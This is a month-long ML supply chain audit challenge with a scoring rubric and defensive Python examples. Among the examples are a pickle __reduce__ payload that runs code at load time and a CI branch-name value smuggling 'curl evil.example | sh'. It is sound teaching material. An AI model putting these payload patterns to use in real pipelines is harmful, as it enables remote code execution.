July 2026: Supply Chain Audit Challenge
Audit an ML project's entire supply chain for security issues including dependencies, model provenance, data pipelines, training infrastructure, and deployment artifacts.
Audit the complete supply chain of an ML project -- from training data and dependencies to model artifacts and deployment configuration. This challenge requires breadth across multiple security domains and develops the systematic thinking needed for comprehensive security assessments.
Challenge Overview
| Detail | Value |
|---|---|
| Duration | July 1--31, 2026 |
| Difficulty | Advanced |
| Estimated Time | 12--18 hours |
| Prerequisites | Software supply chain security concepts, Python packaging, ML pipeline familiarity, container security basics |
| Max Points | 100 |
Scenario
You have been given access to the complete source repository for "SentiBot," a sentiment analysis service. The repository contains everything needed to train, evaluate, package, and deploy models. Your task is to audit this project for supply chain security issues at every level.
The project is structured as a typical ML application:
sentibot/
├── data/
│ ├── raw/ # Training data sources
│ ├── processed/ # Preprocessed datasets
│ └── scripts/ # Data collection and processing scripts
├── models/
│ ├── base/ # Base model checkpoints
│ ├── fine-tuned/ # Fine-tuned model artifacts
│ └── configs/ # Training configurations
├── src/
│ ├── training/ # Training code
│ ├── inference/ # Inference server code
│ ├── preprocessing/ # Data preprocessing pipeline
│ └── evaluation/ # Evaluation scripts
├── deploy/
│ ├── docker/ # Dockerfiles
│ ├── k8s/ # Kubernetes manifests
│ ├── terraform/ # Infrastructure as code
│ └── ci/ # CI/CD pipeline configs
├── tests/ # Test suite
├── requirements.txt # Python dependencies
├── setup.py # Package configuration
├── pyproject.toml # Build configuration
└── README.md
Audit Categories
Category 1: Dependency Security (25 points)
Audit all of the project's dependencies for known vulnerabilities and supply chain risks.
1.1 Python Dependencies (10 points)
- Examine `requirements.txt` and `pyproject.toml` for pinned vs. unpinned dependencies
- Check for known vulnerabilities (CVEs) in declared dependencies
- Identify dependencies from unusual or potentially compromised sources
- Look for typosquatting risks in package names
- Check for dependencies that have been abandoned or have concerning maintainer changes
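As a starting point for the pinning audit, a small script can flag requirements entries that lack an exact version pin. This is a minimal sketch under simplifying assumptions: it treats only `==` (or hash-pinned lines) as pinned, and the sample `reqs` content is illustrative; a real audit would parse with `packaging.requirements` to handle extras, markers, and URL requirements.

```python
def find_unpinned(requirements_text: str) -> list[str]:
    """Return requirement lines that are not pinned to an exact version.

    Only '==' and hash-pinned lines count as pinned; comments and blank
    lines are skipped.
    """
    unpinned = []
    for line in requirements_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop inline comments
        if not line:
            continue
        if "==" not in line and "--hash" not in line:
            unpinned.append(line)
    return unpinned

reqs = """\
torch>=2.0          # floating lower bound -- resolves differently over time
transformers==4.38.2
numpy
requests==2.31.0
"""
print(find_unpinned(reqs))  # ['torch>=2.0', 'numpy']
```

Unpinned entries like these mean two builds of the same commit can ship different code, which is exactly the kind of non-reproducibility this category asks you to document.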
1.2 Container Dependencies (8 points)
- Audit Dockerfiles for base image security (unpinned tags, outdated images, unnecessary packages)
- Check for secrets baked into container layers
- Evaluate the container build process for injection points
- Review multi-stage build hygiene (leaking build artifacts into runtime images)
1.3 Infrastructure Dependencies (7 points)
- Review Terraform modules for pinned versions and source integrity
- Audit Kubernetes manifests for security misconfigurations (privileged containers, host network access, missing resource limits)
- Check CI/CD pipeline configs for injection vulnerabilities and secret handling
Category 2: Data Provenance (20 points)
Audit the training data pipeline for integrity and provenance issues.
2.1 Data Source Verification (10 points)
- Trace every training data source to its origin
- Verify that data collection scripts fetch from expected sources with integrity checks
- Check for data sources that could be manipulated by an adversary (public URLs without checksums, user-contributed content, scraped websites)
- Look for data that has been included without proper licensing
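The integrity-check bullet above comes down to comparing a SHA-256 digest of fetched bytes against a value pinned at the time the source was vetted. A minimal sketch (the pinned digest below is for the literal bytes `b"hello"`, chosen purely for demonstration):

```python
import hashlib
import hmac

def sha256_hex(data: bytes) -> str:
    """Compute the SHA-256 digest of raw bytes as a hex string."""
    return hashlib.sha256(data).hexdigest()

def verify_checksum(data: bytes, expected_hex: str) -> bool:
    """Compare the actual digest against the pin in constant time."""
    return hmac.compare_digest(sha256_hex(data), expected_hex)

# A pinned digest recorded when the data source was originally vetted.
PINNED = "2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824"

assert verify_checksum(b"hello", PINNED)      # matches the pin
assert not verify_checksum(b"hell0", PINNED)  # any tampering fails
```

A data-collection script that fetches from a public URL without a check like this is trusting that the remote content never changes, which is one of the provenance gaps this category asks you to find.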
2.2 Data Pipeline Security (10 points)
- Review preprocessing scripts for injection vulnerabilities (e.g., `eval()` calls on data content, pickle deserialization of untrusted data)
- Check for data validation gaps that would allow poisoned samples to enter the training set
- Verify that processed data checksums are validated before training
- Look for race conditions or TOCTOU issues in the data pipeline
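The `eval()` risk called out above is easy to demonstrate: evaluating field content from a dataset executes whatever expression an adversary embeds in a sample. `ast.literal_eval` accepts only literal structures and is the usual safe replacement (sketch; the payload string is a benign stand-in for attacker-controlled data):

```python
import ast

malicious_field = "__import__('os').getcwd()"  # stand-in for an attacker payload

# eval() happily executes the expression embedded in the data:
result = eval(malicious_field)  # calls os.getcwd() -- arbitrary code in general
print(type(result))

# ast.literal_eval parses only Python literals and rejects everything else:
assert ast.literal_eval("[1, 2, 3]") == [1, 2, 3]
try:
    ast.literal_eval(malicious_field)
except ValueError:
    print("rejected non-literal input")
```

When reviewing the preprocessing scripts, any `eval`, `exec`, or `pickle.loads` applied to data content is a finding, regardless of how trusted the data source appears.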
Category 3: Model Security (25 points)
Audit model artifacts and the training process for security issues.
3.1 Base Model Provenance (10 points)
- Verify the source and integrity of the base model checkpoint
- Check how the base model was downloaded (pinned hash vs. mutable URL)
- Look for model serialization format risks (pickle-based formats that allow arbitrary code execution)
- Verify that model files have not been tampered with since download
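The pickle serialization risk in 3.1 is worth seeing concretely: unpickling can invoke an arbitrary callable via `__reduce__`, so loading an untrusted checkpoint is code execution. A harmless demonstration (the payload just calls `eval` on a benign expression; a real attack could call anything):

```python
import pickle

class MaliciousCheckpoint:
    """Any object can dictate what runs at load time via __reduce__."""

    def __reduce__(self):
        # On pickle.loads(), this calls eval(...) -- a benign stand-in
        # for arbitrary code execution inside a "model file".
        return (eval, ("__import__('platform').python_version()",))

payload = pickle.dumps(MaliciousCheckpoint())
result = pickle.loads(payload)  # executes the embedded call during load
print(result)                   # the interpreter version string, not a model
```

This is why formats that store only tensors and metadata (such as safetensors) are preferred for exchanging model artifacts: nothing executable survives the round trip.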
3.2 Training Process Security (8 points)
- Review training configurations for settings that could introduce vulnerabilities (e.g., learning rates that allow fast overwriting of safety training)
- Check for logging of training metrics that could indicate data poisoning
- Verify that training runs are reproducible from declared inputs
- Look for training shortcuts that bypass validation or evaluation steps
3.3 Model Export and Serving (7 points)
- Audit the model export process for injection points
- Check that exported models are in safe serialization formats (safetensors vs. pickle)
- Verify model signing or integrity checking in the deployment pipeline
- Review the inference server for deserialization vulnerabilities
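For the integrity-checking bullet, one lightweight scheme is a keyed digest (HMAC) computed at export time and verified before serving, so an artifact swapped in transit or at rest fails the check. A sketch under stated assumptions: the key source, the constant name `SIGNING_KEY`, and the fake model bytes are all hypothetical stand-ins.

```python
import hashlib
import hmac

# Hypothetical: in a real pipeline this key comes from a secrets manager,
# never from the repository or a container layer.
SIGNING_KEY = b"example-key-from-secrets-manager"

def sign_model(model_bytes: bytes) -> str:
    """Produce a hex HMAC-SHA256 tag for an exported model artifact."""
    return hmac.new(SIGNING_KEY, model_bytes, hashlib.sha256).hexdigest()

def verify_model(model_bytes: bytes, tag: str) -> bool:
    """Recompute and compare in constant time before loading the model."""
    return hmac.compare_digest(sign_model(model_bytes), tag)

exported = b"\x00fake-model-bytes"      # stand-in for the artifact
tag = sign_model(exported)
assert verify_model(exported, tag)
assert not verify_model(exported + b"tamper", tag)
```

Unlike a plain checksum, the keyed tag cannot be recomputed by an attacker who can modify the artifact but does not hold the key; production systems typically use asymmetric signing (e.g., Sigstore-style tooling) so the serving side needs no secret at all.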
Category 4: Deployment Security (20 points)
Audit the deployment pipeline and runtime configuration.
4.1 CI/CD Pipeline (10 points)
- Review CI/CD configuration for command injection vulnerabilities
- Check for secrets in pipeline logs or environment variables
- Verify that pipeline runs use pinned tool versions
- Look for missing security gates (no vulnerability scanning, no model validation before deployment)
- Check for pull request pipeline triggers that could execute attacker-controlled code
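A common CI injection pattern is interpolating an attacker-controlled value (a branch name, a PR title) into a shell command. Expressed in Python terms, the fix is passing arguments as a list (no shell) or quoting with `shlex.quote` when a shell string is unavoidable. This is a sketch; the branch name is a hypothetical payload and the `git` command is only illustrated, not executed:

```python
import shlex

branch = 'feature"; curl evil.example | sh; echo "'  # attacker-chosen value

# Vulnerable pattern: the value is spliced into a shell string, so the
# embedded commands would run if this string reached a shell.
vulnerable = f'git checkout "{branch}"'

# Safe pattern 1: argument list for subprocess.run -- no shell at all.
safe_argv = ["git", "checkout", branch]

# Safe pattern 2: explicit quoting if a shell string is unavoidable.
safe_shell = f"git checkout {shlex.quote(branch)}"
print(safe_shell)
```

The same principle applies to CI config files: expanding `${{ github.head_ref }}`-style values directly inside a `run:` step is the YAML equivalent of the vulnerable pattern above.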
4.2 Runtime Configuration (10 points)
- Review Kubernetes manifests for security context misconfigurations
- Check for exposed management interfaces or debug endpoints
- Verify that secrets are managed through a proper secrets manager (not hardcoded or in environment variables)
- Review network policies for proper segmentation
- Check for overly permissive IAM roles or service account permissions
Category 5: Bonus Findings (10 points)
Additional points for:
- Discovering issues that do not fit neatly into the categories above
- Demonstrating attack chains that combine multiple supply chain weaknesses
- Providing a risk-prioritized remediation roadmap
- Identifying systemic issues in the project's security practices
Audit Methodology
Phase 1: Inventory (2--3 hours)
Before looking for vulnerabilities, build a complete inventory:
- Bill of Materials. List every dependency, tool, and external resource used by the project.
- Data flow diagram. Map how data moves from sources through processing and training, and into the deployed model.
- Trust boundaries. Identify where the project trusts external inputs (downloaded models, fetched data, user-contributed code).
Phase 2: Automated Scanning (2--3 hours)
Use automated tools to find known issues:
| Tool Category | What It Finds | Limitations |
|---|---|---|
| Dependency scanners (pip-audit, Safety) | Known CVEs in Python packages | Only finds published vulnerabilities |
| Container scanners (Trivy, Grype) | OS and language package vulnerabilities in containers | Does not audit application logic |
| IaC scanners (Checkov, tfsec) | Misconfigurations in Terraform and Kubernetes | Rule-based, misses novel issues |
| SAST (Bandit, Semgrep) | Code-level security issues | High false-positive rate, misses ML-specific issues |
Phase 3: Manual Review (6--8 hours)
Automated tools miss the most interesting supply chain issues. Manual review should focus on:
- Trust decisions. Every place the code trusts an external input is a potential vulnerability. Review each one.
- Serialization boundaries. Data crossing serialization boundaries (pickle, JSON, protobuf) is a common attack vector.
- Build reproducibility. Can you reproduce the same model artifact from the same inputs? If not, something in the pipeline is non-deterministic and potentially manipulable.
- Access control gaps. Who can modify each component? A dependency that anyone can publish a new version of is different from one maintained by a trusted organization.
Phase 4: Reporting (2--3 hours)
Organize findings by risk level and provide actionable remediation:
## Finding: [Title]
**Risk Level:** Critical/High/Medium/Low
**Category:** Dependency/Data/Model/Deployment
**CVSS:** [Score if applicable]
### Description
[What the issue is and where it exists]
### Evidence
[Specific files, lines, or configurations that demonstrate the issue]
### Attack Scenario
[How an adversary could exploit this issue]
### Remediation
[Specific steps to fix the issue, with code examples where helpful]
### Priority
[Why this should be fixed now/soon/eventually]

Planted Vulnerabilities
The repository contains a mix of realistic vulnerabilities:
- Obvious issues that any security scanner would catch (5--6 findings)
- Subtle issues that require manual review to identify (8--10 findings)
- ML-specific issues that traditional security tools miss entirely (4--5 findings)
- Red herrings that look suspicious but are not actually exploitable (2--3 instances)
Part of the challenge is distinguishing real vulnerabilities from false positives and prioritizing findings by actual risk.
Scoring
| Category | Points | What Earns Full Marks |
|---|---|---|
| Dependency Security | 25 | All planted dependency issues found with severity assessments |
| Data Provenance | 20 | Complete data flow audit with provenance gaps identified |
| Model Security | 25 | Model artifact integrity issues and serialization risks found |
| Deployment Security | 20 | CI/CD and runtime misconfigurations documented |
| Bonus | 10 | Attack chains, prioritized remediation, systemic analysis |
Why Supply Chain Auditing Is Different for ML
Traditional software supply chain auditing focuses on code dependencies and build pipelines. ML projects add attack surfaces that traditional tools do not cover:
Data as a Dependency
In traditional software, dependencies are libraries and frameworks -- versioned, published, and (ideally) reviewed. In ML, training data is a dependency with none of these properties:
- Training data is often unversioned. The same data source may change over time without any record.
- Data provenance is rarely tracked. The chain of custody from original source to training input is usually undocumented.
- Data integrity is hard to verify. Without knowing the correct label, a poisoned training sample looks identical to a legitimate one.
This challenge forces you to think about data with the same rigor you apply to code dependencies: where did it come from, how was it verified, and what happens if it is compromised?
Models as Build Artifacts
A trained model is the ML equivalent of a compiled binary. Like a binary, it is opaque -- you cannot easily inspect its behavior by reading its weights. Unlike a binary, it cannot be reproducibly built from source in most cases:
- Non-deterministic training means the same code and data may produce different models.
- Base models downloaded from public repositories are trusted on reputation, not on verifiable provenance.
- Model serialization formats (especially pickle-based formats) can contain arbitrary executable code.
The GPU Trust Boundary
ML training and inference run on GPU hardware that introduces its own trust considerations:
- GPU drivers and CUDA libraries are part of the trusted computing base but are rarely audited.
- Shared GPU environments (cloud instances, shared clusters) may leak information between tenants through shared memory.
- GPU-specific optimizations (mixed precision, quantization) alter model behavior in ways that may have security implications.
Connecting to Professional Practice
Supply chain auditing is one of the most sought-after skills in AI security. Organizations deploying ML systems need to answer questions like:
- "Can we trust this model from Hugging Face?"
- "What happens if our training data provider is compromised?"
- "Are our CI/CD pipelines secure against an insider threat?"
- "How do we verify that the model in production is the model we trained?"
This challenge develops the systematic thinking and technical skills needed to answer these questions for real organizations.
Further Reading
- Infrastructure & Supply Chain -- supply chain security fundamentals
- LLMOps Security -- operational security for ML pipelines
- Fine-Tuning Security -- security of fine-tuning processes
- August 2026 Challenge -- the next challenge